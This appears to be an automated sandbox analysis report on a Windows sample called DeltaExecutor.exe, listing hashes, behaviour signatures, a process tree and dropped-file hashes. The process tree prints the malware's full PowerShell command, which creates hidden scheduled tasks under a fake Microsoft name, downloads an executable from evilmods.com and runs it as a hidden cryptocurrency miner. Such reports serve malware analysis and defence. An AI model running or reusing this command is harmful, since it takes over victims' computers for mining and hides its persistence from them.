Resubmissions
01/01/2025, 20:08
250101-yw3eystrcl 801/01/2025, 20:04
250101-ytbt8a1qe1 801/01/2025, 20:01
250101-yrhvra1pgx 801/01/2025, 14:10
250101-rgpf8axnaw 10Analysis
-
max time kernel
120s -
max time network
141s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
-
submitted
01/01/2025, 20:01
General
-
Target
DeltaExecutor.exe
-
Size
169KB
-
MD5
a614a895161a44b174f8b0c5e0d94adf
-
SHA1
1594a374c81ee36ce6dcff56f13169c4400b8714
-
SHA256
d6f67c596a3017fab0f6908f38de0f996fe8742dc7131d491343d128d96564f6
-
SHA512
3e7f9116b528ff8a2aef56f006f8f5c231dcd0fd3e951ce4b3a0582a4429836bcded1469ba7c3ff41d59bafcee05d77150ced675c8b9fe69f17ff734de5ee981
-
SSDEEP
3072:nczkitvo4BpYN/6mBPry8TXROLdW5m4mUR59OOGJ0kA30165M1fSV:nA4NCmBPry/N2lOOYg0kWE
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies Internet Explorer settings 1 TTPs 36 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 6 IoCs
-
Suspicious use of WriteProcessMemory 10 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\DeltaExecutor.exe"C:\Users\Admin\AppData\Local\Temp\DeltaExecutor.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://igk.filexspace.com/getfile/QDJEILD?title=DependencyCore&tracker=erg12⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1384 CREDAT:275457 /prefetch:23⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -ExecutionPolicy Bypass -Command "Register-ScheduledTask -TaskName MicrosoftConsoleSetup -Action (New-ScheduledTaskAction -Execute cmd -Argument '/c start /min \"\" powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"New-Item -Path \\.\C:\ProgramData\Con\ -ItemType Directory; (Get-Item \\.\C:\ProgramData\Con\).Attributes = ''ReadOnly, Hidden, System''; Invoke-WebRequest -Uri https://evilmods.com/api/nothingtoseehere.exe -OutFile C:\ProgramData\Con\services.exe; Set-ScheduledTask -TaskName MicrosoftConsole -Trigger (New-ScheduledTaskTrigger -AtLogOn); Unregister-ScheduledTask -TaskName MicrosoftConsoleSetup -Confirm:$false; Start-ScheduledTask -TaskName MicrosoftConsole;\"') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0 -Priority 1 -Hidden -DisallowHardTerminate -DontStopOnIdleEnd) -RunLevel Highest -Force; Register-ScheduledTask -TaskName MicrosoftConsole -Action (New-ScheduledTaskAction -Execute cmd -Argument '/c start /min \"\" powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"C:\ProgramData\Con\services.exe --algo AUTOLYKOS2 --pool erg.2miners.com:18888 --user bc1qyy0cv8snz7zqummg0yucdfzpxv2a5syu7xzsdq.1RnL4MrKFO --tls on --log off\"') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0 -Priority 1 -Hidden -DisallowHardTerminate -DontStopOnIdleEnd) -RunLevel Highest -Force;"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
914B
MD5e4a68ac854ac5242460afd72481b2a44
SHA1df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA5125622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5
-
Filesize
1KB
MD5a266bb7dcc38a562631361bbf61dd11b
SHA13b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA5120da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc
-
Filesize
252B
MD5220651c867b508fcdf9aadeb562027b2
SHA1a6cae2349d8468a09ed4464d429130cdd7be1d8d
SHA256be08c1869c628d36aef637549fa461b3fa9582c9480081e2417015bf7110612b
SHA51236f6c46aee672d6950f361a8aa97b9a9d1e6fc22c619801195641e49c0a307fb2a4708862444325bb8aa1ce7de2e2634e699d8c83196ff111512ea5e8dab744e
-
Filesize
342B
MD59a474be47423835b22e7e38cf3279371
SHA11ef9a6e5a18c21f2e2553c7376d2efc07a965cda
SHA2568e561904145401f0411bd45a1509b70c14b30e2fcb939cc3c2cc2e8c7f3ed375
SHA512be76bc5c557a27f68ee137eeaaef15678b8e4379d53e878c0ae5192f442a9195007806ad38dfd8420b7fbd75daea97a4c0bb237c9baf6f1ec9fc375680a0ab51
-
Filesize
342B
MD554455331a25b676c5d5c918b93c8b4be
SHA1a99dbcd5679d503e3f2168fd1300b556fd0ba991
SHA256ffdef28c982e61723f899a754f60c4fecc036823512b536c32eb791f6fd22131
SHA5128e27d564bdde41518fd90c2e9d06987a217714bb15320e388a09db16d72efbda6845e2220aaa9241599da911e0e3774709a62966b55090f804596f4fbc6ae8e9
-
Filesize
342B
MD547dd8211b779c2a941d7f521e98ccf8c
SHA14f4ac575b645650ba19eb45e2a773e1429394120
SHA2569d430507b47c7e9fdea2a49451f5dd14826a5cb3c2f8904c9df160275b39b12f
SHA5128ce5dcd319e47c184e8c7941ff9ba0f3a66bee4462e0d73d9fea5437c303513789f8c3eaf37acfbdf253886e3ce47c3710e15aa55f7377c041e5734a9e8afaa9
-
Filesize
342B
MD527cb8b062717cfc303a728a8d85d8ca5
SHA1a1303cb2c44a2ef861c359106dd9c08c8fa67559
SHA256a6dfcc875175de9a23b652bfa058308aa09bf47ea7d62fd04fe2c6c4ed04d5a1
SHA5125b668a35be1d082fbcfd8709d3bab1e60a14e5716d6cd916d07bf38ad8a257e335a294bbb5c0c1515e9214de70d203eca0fb6faaa3b77c57bd2f164316f1832c
-
Filesize
342B
MD56b5279dfc1dac768afbc73dd5e0836d6
SHA11bc7af5d6bfe5bdf8a1595ecaef013af3cea2f71
SHA256286c661c91e09043517c8840b712aba2edd3a684f00da3ca7a438dbc15352067
SHA51216977edc6724720d06762e5a1ffefce4fc30a74bdcb130ada2f611f193a08cf6adc04fee2b38c2600fc64c15ea4a43eaa6e40fb51d1c5df6dcb07694f3e62b43
-
Filesize
342B
MD505331d6b4ef75e3fe47300048cff8022
SHA19481ccc8b03efedd1af2ab9722ab12208eddeaf5
SHA2569f969708570f5b4be8f216fa3d1cefc0951eeba13e6d129cb0bd481542ca7a3e
SHA512f3ce379e376f823a3814752c3004355a3fdc7b2fa485ce4f5f396639b9623390b7a6f433585ac3d16de990888cde0dceb24b284dfa9a32f707182a8f5a914eb4
-
Filesize
342B
MD57e0f2b736ec58665bc58f921352e0204
SHA14c3b1c372a9ab9557f3829c8c699f900030f3c42
SHA25663ac4a3bcf5cc4705bf2ba845520a4fba75bb2b85ba05dde304c5c5286dc8e03
SHA51284da2a292fbdaa4f7d96e7a781f1e68aa3ba67cd1b14951ca8090c7a8ca158d621a747750be9d0044bdbdc71563edf1a31bdc82a528546e86f27dd9545251e70
-
Filesize
342B
MD5284e5667fad62a4d653d758dd716f841
SHA15b1ce7b74e8596ab42540cf3c90e518b79175fb9
SHA256f33028c4e5c9faba3970dfde91b19fa9aac3a070ed9c0a7617d557a8b0eefaf2
SHA512db95c82a6932d5acb41e896b30fb16cc203bb94b1827d7ea48776ebd5434d2eb97a3333f489d248a86a1d86b0d42903835559d8775b49cf967939396c67148b1
-
Filesize
342B
MD54f70f7ff8c438dc421b99126fa3c3c82
SHA1b437b1a1873c5bac09ea4197b0bc44d741efc701
SHA2563ca6c0f2a9c7547decb1c31584cb8460c7a50e9821d45a0f664e5539a8eda814
SHA512cd984b865d0707a40b89723533562ff4205df619df52dd844efa04642d4e31378b47bb8c062cdd47ee964696adb6ec6702fcae4eb569d256b1ba035e1baa19c5
-
Filesize
342B
MD569b5d2e8b35baa70ee41c483f2c5ce5f
SHA1e939e64e47fa384341d5079249092795c4df82e4
SHA2567a8f27934299b214abbb9ea1e51637f1c06bc63f01304c4bfcc90577a35965af
SHA512c0d13626086ca0ba8542e2fe06438f29a4a4435d21c89e031a6eb1eddd6fb0ca903e4fcd5abc0d14d0411431ddd86bfaf95fef461577bab93591b0a5cb8e2d5f
-
Filesize
342B
MD5e459af1f952da4f44e2e0b25cd2ea08b
SHA1b773dff75b13537e68344a48f9aa8bfc86fef1f2
SHA256398c75b4a7713cebe8a2e406198c3c61072ac19100da59d34ee3295c440e8da4
SHA51215b1d2654f9b1389e508175b8222b97c7a8bd1c81307f4e9aaead9acb79bf3bbe446ff85fba4dc870e8379f637b0036cf3f847edc075b80c15a5b9e9ecaece13
-
Filesize
342B
MD5164f69d15702ff80f4c210748148cd95
SHA11483128549880ad7c9916f42d44c3c56aae4ef93
SHA256f626bff567729e11c9b83bc702040463ee21a6ea006545313f0c7bcae51b9377
SHA51237bb1cf20fdd62d5e6f015c1238c04cddd509f856b085f1e9daee70b38e61fb7565da6464940cbeab05ac1e873549111be3f84077cc467e91ef457b4f1020f4e
-
Filesize
342B
MD50422c1ab280e786872b8ac8ca8e5f033
SHA1a011b7bc83621c93357306fd0163bb476c01cb8d
SHA2560721f55fcdab1e578889cbae9227893baed73e22c72e0fdfdf5ac68887bbc027
SHA5121e76097b07fb745a56b4ec51aac24c126754a2db86ec80284d0513d2e720e6861bd174231dcfcf6707eb0ebe699b334446c7a65fdbb1e32a90a898823496fb3f
-
Filesize
342B
MD58bc2205929b064ab8668fb08fb63c044
SHA1ce63b716bf5973bc0f9f5f2e38a7922c2f633492
SHA2564aee26b1043df75d74afe5eec93d0587d318b51d470787122b271060743d0d3f
SHA51267fec2a248ff72152018afe6f81b930fb084d429cf300fd5d723f8068acb174ab38a1b1a95b770d6437e05f4636931c8245fcc1e469abaa84bfdff5ab73ecd60
-
Filesize
342B
MD5d71759f7e1a54bbbba52e868bec187b9
SHA18a2e33b30075ccbe07701602bf914c55d04119a6
SHA2562d04065c78595c930ffb3a3d914e987ca9cd5009bf77577dad327ab6e233c486
SHA512a4b868f3758bde9b0effcf83fecf9b987dae72bd0d02b996b4fcbb9bf14e9759ecccbfd060abdba62c008ba1e1f3ccf22270719fae44abd2995f48a70fad84de
-
Filesize
342B
MD55573ebe8cb72844c2688a44e5ac10b7c
SHA13fd52c30cc20521a221f78b8d574ee041e8e3384
SHA2567504ccc774d6449f01a9626b53c6f82bec0483d518aac4aaf0432680d6d7bcdb
SHA5129497b1ecae7cb7048a47bb84b004e0b3e68b98aa0bd2182a4e11470875e8bbe7f81273e210d6dd1cab39a0068a02d2340c97c54b5afe70e8a2270eb5a2629dc4
-
Filesize
342B
MD51cc6772c91fe394362a99562fe830e9a
SHA15a372f9e11be8263817285dc61f3a78685589c95
SHA2569e11f13faa3e00977e6aa454e869fb61f3cdb5a26f245631c7286cf3fecf6575
SHA5127f9872492657fd46400889c7e19b964e142ee582618e444d9b6bf2c5a98744d9dd0416aad8d955b455342610da81045b0f76e9be0ad20d0cde3eafe686ca7ffe
-
Filesize
342B
MD576aa546c7125cc1acca88b949ae3f343
SHA1abab75f422ed5c9f35e5ead21b067b01835d6698
SHA256ec8ba70ebfabc8549963dc1e6ce69202e662b01cd416045786e93201f6e7c90c
SHA51268a7ce06b3321299a08a37490f220e826428653e04c30570e3b9765c00aaa1a5064a4ec8f7c7c9f0621582caa337af505f3ad91eb396ab0103fe7de254d50698
-
Filesize
342B
MD56fc1eac6afd31b1523ec1a1fec787e72
SHA15cdb0d83ae7155eea3122deed2370544376520e3
SHA2565fac5b4ebd5c45ef546879490dae5cd84a630df145b41cd0ec77e20fb1509103
SHA512d2dd33cb849a45a63c577de2ad73c95d373a94c01e157e22978a7f3ebd3cc0e245744516b00cdd6a6ebc59cca2bd1b6519df2d6c45f31b9b950bc58752bff64c
-
Filesize
242B
MD5649ca8637cd6ef7ed1370c886a6c6efc
SHA1eeeb691c123f5159a19c9d77877c3ecd7341c7c4
SHA256f704a9873442296e25aaa8fb6024fed644f4790ddf44e5733c84c1d6d439e7be
SHA512a6b6f7b52db0dc28465eaee88ebdfd79c5b80abaa479afb537f33c17bae546909ba955586b86f4fd1a2d3d42f10d7a0cee0026836a7d2b761ff85deee5c40c25
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
32KB
-
Filesize
9.6MB
-
Filesize
2.9MB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB